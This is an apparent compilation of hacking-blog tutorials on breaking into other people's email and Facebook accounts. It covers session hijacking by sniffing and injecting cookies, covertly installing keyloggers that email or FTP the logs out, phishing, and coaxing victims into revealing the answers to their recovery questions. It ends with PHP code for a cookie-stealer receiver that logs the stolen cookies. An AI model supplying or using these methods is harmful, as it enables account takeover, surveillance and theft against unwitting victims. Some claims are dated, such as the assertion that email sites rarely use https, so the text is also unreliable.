How to Hack an Email Account with Cookies

If you are a newbie and don't know about cookie, then for your information, Cookie is a piece of text stored on user computer by websites visited by the user. This stored cookie is used by webserver to identify and authenticate the user. So, if you steal this cookie (which is stored in victim browser) and inject this stealed cookie in your browser, you can imitate victim identity to webserver and enter hisEmail account easily. This is called Session Hijacking. Thus, you can easily hack Email account using such Cookie stealing hacks. 

Tools needed for Cookie stealing attack:

Cookie stealing attack requires two types of tools:

1. Cookie capturing tool
2. Cookie injecting/editing tool

1. Cookie capturing tool:
Suppose, you are running your computer on a LAN. The victim too runs on same LAN. Then, you can use Cookie capturing tool to sniff all the packets to and from victim computer. Some of the packets contain cookie information. These packets can be decoded using Cookie capturing tool and you can easily obtain cookie information necessary to hackEmail account. Wireshark and HTTP Debugger Pro softwares can be used to capture cookies. 

Update: Check out my Wireshark tutorial for more information on cookie capturing tool.

2. Cookie injecting/editing tool:

Now, once you have successfully captured your victim cookies, you have inject those cookies in your browser. This job is done using Cookie injecting tool. Also, in certain cases after injection, you need to edit cookies which can be done by Cookie editing tool. This cookie injection/editing can be done using simple Firefox addons Add N Edit Cookies and Greasemonkey scripts. I will write more on these two tools in my future articles.

Drawbacks of Cookie Stealing:

Cookie Stealing is neglected because it has some serious drawbacks:

1. Cookie has an expiry time i.e. after certain trigger cookie expires and you cannot use it to hijack victim session. Cookie expiry is implemented in two ways:
   1. By assigning specific timestamp(helpful for us).
   2. By checking for triggers like user exiting from webbrowser. So, in such cases, whenever user exits from his browser, his cookie expires and our captured cookie becomes useless.
2. Cookie stealing becomes useless in SSL encrypted environment i.e. for https (Secure HTTP) links. But, most Email accounts and social networking sites rarely use https unless vicitm has manually set https as mandatory connection type.
3. Also, most cookies expire once victim hits on LogOut button. So, you have to implement this Cookie stealing hack while user is logged in. But, I think this is not such a serious drawback because most of us have the habit of checking "Remember Me". So, very few people actually log out of their accounts on their PCs.

So friends, this was a short tutorial on basics of how to hack Email account using Cookie Stealing.As I have stated, Cookie stealing has some disadvantages. But, I think Cookie stealing is a handy way to hack an Email account. In my next articles, I will post detailed tutorial to hack Facebook and Gmail accounts using Cookie stealing. If you have any problem in this tutorial on how to hack Email account using Cookie stealing, please mention it in comments.

Enjoy Cookie stealing trick to hack Email account.

Tutorial: Hacking Facebook Techniques

A note for the newcomers - Contrary to popular belief there doesn't exist some secret software where one can just put in an email id, press "Enter" and all the passwords associated with that account magically appear. Hacking facebook, like any other hack takes time, skill and effort. Also, the methods are much the same for hacking any type of account for that matter. 

There are 3 main methods used when it comes to Hacking Facebook accounts. Briefly,They are : 

1.Keyloggers : Making the victim open up his account on a system with a keylogger attached/ Sending a remote keylogger to the victim. 
2.Phishing : Making a fake login page and having the entered details sent to you.(This has been explained in the "Starting Off" section). 
3.Social Engineering : This is just a fancy term for making the victim give up vital information in a supposedly casual conversation. The information may be the user's recovery question's answer, which can then be used to take over the account via : "Forgot your password? Click Here!" Button. 

Some time ago, Facebook developers patched in a new security feature. In a nutshell, if facebook detects that your IP address is different from the usual(previously used) IP addresses, it may stop you from logging in without further identitiy verificiation which may be, for example: an SMS code. Now this can potentially effect every type of hack, but if it is infact possible there is only one way to know- By doing it. Hope for the best, Prepare for the worst. 

1.Keyloggers:
A Keylogger is type of software that usually runs in the background, without the knowledge of an innocent victim and secretly records their actions. A wide variety of functionality is offered by various products : Almost all record every keystroke on the keyboard in a simple text file format, some record mouse clicks and pointer locations, some record folders and files opened and some even take screenshots at regular intervals. 
Most of the keyloggers provide an option whether to store the text file locally send it to an FTP server or your email id. They can be installed and set up relatively easily like any other program. Once setup, they usually go into hiding as a background process leaving no trace on the surface and starting up automatically when the operating system starts. 

For some reason people seem to avoid or look over keyloggers, I can give you my word this is the best and easiest method for hacking any type of account there is, so definitely check this out. In our case, we want the victim to login to their facebook account on a compromised system, one that has a stealthy keylogger installed. There are two ways to go about this :Installing a keylogger on your system and having them use it to login to their FB account, or if you have temporary access to their system- Installing it on their computer and having the log files sent to you by email or FTP.
Whichever way you prefer, the method is the same. Download a keylogger, follow the smooth setup instructions as you would when installing anything, customize settings according to your preference and Let it rip ! 
I have personally tried and tested the following keyloggers, you can choose any of these randomly since they all seem to do the job : 

(i)Actual key-logger - Download from http://www.actualkeylogger.com/download-free-key-logger.html 
(ii)Home key-logger - Download from http://www.kmint21.com/download.html 
(iii) REFOG Free key-logger - Download from https://www.refog.com/download.html 

(P.S- Certain full versions of very good keyloggers are available as torrents from websites like isohunt.com , kickass.to but these torrents are illegal and we shouldn't use them) 

2.Phishing : This method has been described in great detail in the "Starting Off" section. Follow the instructions carefully while using facebook.com instead of gmail.com. 

3.Social Engineering : 
Facebook uses security questions as a recovery method, almost everyone sets it up to a personal question like : 
"Where were you born? " 
"What was your first pets name? " 

Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures. 
A social engineer runs what used to be called a "con game." For example, a person using social engineering to break into a computer network might try to gain the confidence of an authorized user and get them to reveal information that compromises the network's security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, call the authorized employee with some kind of urgent problem that requires immediate network access. 
Appeal to vanity, appeal to authority, appeal to greed, and old-fashioned eavesdropping are other typical social engineering techniques. 

For this method to work, you need to know the person whos account you want to hack. In fact, you need to know them well enough, such that it doesn't seem suspicious when you carefully try to work up their recovery questions into your conversation and get them to answer it casually. 
After that,using the "Forgot your password? Click Here!" Button one can simply turn over an account's user. But even after this, your work is not done yet. Nowadays facebook has implemented a 24 hour delay before recovering the account and logging in, So if the victim happens to log in during that period they can reverse the process in seconds. Not only do you need careful planning, but also careful timing. 
Facebook uses a verification method during recovery -if the victim's email and phone number are no longer functional it asks to put in another phone number. If you can somehow get a hold of their cell phones or email accounts their account is yours, otherwise the process may be slow and fruitless.

How To Make A Cookie Stealer Php Script

Hi friends, Lets know that exactly how does acookie stealer work. There are two components in a cookie stealer: the senderand the receiver. 

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.

Php Coding a receiver is the part. Only two things are needed to make a receiver : a webhost/ftp which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said, the receiver's job is to receive the cookie from the sender. Once the receiver has the cookie, it needs a way to get that cookie to you.

<?php                                      // line 1
$cookie = $HTTP_GET_VARS["cookie"];       // line 2
$file = fopen('cookielog.txt', 'a');     // line 3
fwrite($file, $cookie . "\n\n");        // line 4
?>

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.

Done ! Just upload the files on ftp server and make permission of text file "cookielog.txt" to 777. How to grab cookies is explained in next articles "Complete tutorial on Cross Site Scripting / XSS Hacking !"
Thank you for reading this articles.